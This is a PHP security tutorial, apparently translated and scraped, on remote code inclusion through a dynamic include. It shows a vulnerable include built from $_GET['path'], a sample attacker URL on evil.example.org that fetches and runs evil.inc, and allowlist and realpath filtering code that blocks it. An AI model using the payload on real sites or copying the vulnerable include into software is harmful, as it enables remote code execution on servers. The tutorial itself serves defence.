PHP Security: Code Injection

Source: Internet
Author: User



Code injection

A particularly dangerous situation arises when tainted data forms the leading part of a dynamic include:

<?php
include "{$_GET['path']}/header.inc";
?>


In this scenario the attacker controls not just the file name but also the kind of resource that gets included. By default PHP can include not only local files but also remote resources such as the following (controlled by allow_url_fopen in the configuration file):

<?php
include 'http://www.google.com/';
?>


The include statement fetches the web page at that URL and includes its source as if it were a local file. The example itself is harmless, but imagine that the source returned by Google contained PHP code: it would be parsed and executed. That is an opening for an attacker to plant malicious code and defeat your security controls.

Now imagine that the value of path points to a resource under the attacker's control:

http://www.php.cn/... e.org%2fevil.inc%3f

In the example above, the value of path is URL-encoded; decoded, it reads as follows:

http://evil.example.org/evil.inc?

This causes the include statement to fetch and execute a script of the attacker's choosing (evil.inc), while the original trailing file name /header.inc is treated as the query string:

<?php
include "http://evil.example.org/evil.inc?/header.inc";
?>


The trailing question mark spares the attacker from having to guess the remaining directory and file name (/header.inc) and recreate that path on evil.example.org. Even where the attacked site's file names are hidden from him, he only has to make sure that the code he wants executed is what evil.inc returns in its output.

This is as dangerous as letting an attacker edit the PHP code on your site directly. Fortunately, filtering the data before it reaches include and require statements prevents it:

<?php
$clean = array();
/* $_GET['path'] is filtered and the result stored in $clean['path']. */
include "{$clean['path']}/header.inc";
?>
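The filtering step above is left abstract in the article. The following is an added example, not code from the original text, showing two ways to fill $clean['path'] so that the attacker's value from the article is rejected: a fixed allowlist of section names, and a realpath() containment check for cases where the set of files is not fixed. The template directory, the allowlist entries and the helper names are assumptions made for this demonstration.

```php
<?php
// Added example (not from the original article): validate a user-supplied
// "path" before it reaches include. TEMPLATE_BASE and ALLOWED_SECTIONS are
// assumed values for this demonstration.
declare(strict_types=1);

const TEMPLATE_BASE     = __DIR__ . '/templates';      // assumed layout
const ALLOWED_SECTIONS  = ['home', 'about', 'contact']; // assumed allowlist

/**
 * Strictest option: map the request parameter onto a fixed set of names.
 * Anything not in the allowlist is rejected, so URLs, "../" sequences and
 * query-string tricks never reach include at all.
 */
function cleanSectionByAllowlist(string $requested): ?string
{
    return in_array($requested, ALLOWED_SECTIONS, true) ? $requested : null;
}

/**
 * Looser option when the set of files is not fixed: reject anything that
 * carries a stream-wrapper scheme, then resolve the candidate with realpath()
 * and insist that it stays inside TEMPLATE_BASE. Returns the resolved header
 * file on success, null on any failure.
 */
function cleanHeaderByRealpath(string $requested): ?string
{
    // "http://", "ftp://", "php://", "data:" ... all begin with a scheme.
    if (preg_match('~^[a-z][a-z0-9+.\-]*:~i', $requested) === 1) {
        return null;
    }
    // A null byte is never legitimate in a path component.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $base      = realpath(TEMPLATE_BASE);
    $candidate = realpath(TEMPLATE_BASE . '/' . $requested . '/header.inc');
    if ($base === false || $candidate === false) {
        return null; // directory or file does not exist
    }
    // Containment: the resolved file must sit below the base directory, so a
    // "../" sequence or a symlink that escapes the template tree is refused.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed sample inputs: the attacker's value from the article, a
// traversal attempt, and a legitimate section name.
$samples = [
    'http://evil.example.org/evil.inc?',
    '../../etc',
    'about',
];
foreach ($samples as $value) {
    printf(
        "%-36s allowlist=%s realpath=%s\n",
        $value,
        var_export(cleanSectionByAllowlist($value), true),
        var_export(cleanHeaderByRealpath($value), true)
    );
}

// How the page from the article would use it: only the filtered value is
// interpolated, and a rejected value never reaches include.
$clean = [];
$clean['path'] = cleanSectionByAllowlist((string)($_GET['path'] ?? ''));
if ($clean['path'] === null) {
    http_response_code(400);
    exit("invalid path\n");
}
include TEMPLATE_BASE . "/{$clean['path']}/header.inc";
```

Run from the command line the loop prints NULL for both hostile values under each check; 'about' passes the allowlist, and passes the realpath check only once templates/about/header.inc actually exists, which is the behaviour you want before an include. Prefer the allowlist whenever the set of includable files is known in advance. As a second layer, keep allow_url_include (which governs include and require of URL wrappers and is Off by default) disabled in php.ini, so that even an unfiltered value cannot pull in remote code.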
